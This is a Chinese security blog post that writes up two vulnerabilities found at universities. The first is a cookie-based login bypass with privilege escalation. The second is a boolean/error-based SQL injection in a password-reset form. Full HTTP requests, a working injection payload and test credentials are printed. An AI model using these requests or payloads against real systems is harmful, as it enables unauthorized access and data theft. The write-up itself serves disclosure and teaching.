声明:由于传播、利用本公众号湘安无事所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。如有侵权烦请告知,我们会立即删除并致歉。谢谢!
01.越权拿下某学院
资产证明
使用登录逻辑漏洞
在登录框这里
把0改为1
成功进入后台
退出后台
POST /Ajax/login.ashx?act=GetAdmin&sf_request_type=ajax HTTP/1.1Host: jagedayth.123456.comCookie: CheckCode=55381; adminid=cookie=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: /Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originContent-Length: 0Te: trailersConnection: close
把cookie删除也能未授权访问
这里因为cookie没限制我设置越权
admin1/123321
这里是我是访问不到用户管理,只能管理学生,那么通过上一个包的接口 我尝试越权
原本是这样的包
我替换一下
/Ajax/login.ashx?act=GetAdmin&sf_request_type=ajax证明越权成功
存在登录逻辑漏洞和未授权访问账户密码,垂直越权漏洞
然后拿到管理员账户 在水一波账户密码
资产证明
url
https://xxxxxxxxx.com/login.html
现在管理员登录(这里不是系统管理员的)
admin1
123321
证明用有管理员权限
02. 注入拿下某985高校
证书站:某985大学(sql注入 深情大佬手把手教的)
资产证明,同时edu域名
访问这个忘记密码
这里有一个注入点
POST /bsuims/bsUserPasswordResetInit.do?sectionName=passwordReset&itemName=passwordQuerySubmit HTTP/1.1Host: 985.edu.cnCookie: JSESSIONID=4ABE3725545365FDAE07177C305B0292User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------20201266305629664431108797992Content-Length: 1251Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close-----------------------------20201266305629664431108797992Content-Disposition: form-data; name="contextPath"-----------------------------20201266305629664431108797992Content-Disposition: form-data; name="contextName"bsUserQueryPassswordPage-----------------------------20201266305629664431108797992Content-Disposition: form-data; name="contextPara"-----------------------------20201266305629664431108797992Content-Disposition: form-data; name="sectionName"login-----------------------------20201266305629664431108797992Content-Disposition: form-data; name="itemName"loginAction-----------------------------20201266305629664431108797992Content-Disposition: form-data; name="controlType"frame-----------------------------20201266305629664431108797992Content-Disposition: form-data; name="passwordReset_userName"'-1/case when mid(user(),1,1)='a' then exp(999) else exp(1) end-'-----------------------------20201266305629664431108797992Content-Disposition: form-data; name="passwordReset_email"aaaa-----------------------------20201266305629664431108797992Content-Disposition: form-data; name="passwordReset_idCard"aaaa-----------------------------20201266305629664431108797992--
判断方式不同
用bp跑一下
因为有的mysql是不区分大小写的
以上漏洞 都已经修复
实习/校招/社招
安全服务工程师、安全攻防工程师、安全研发工程师、前后端开发工程师、测试工程师等等,所有岗位均可内推 |
推荐阅读
渗透实战|记一次简单的Docker逃逸+反编译jar接管云主机
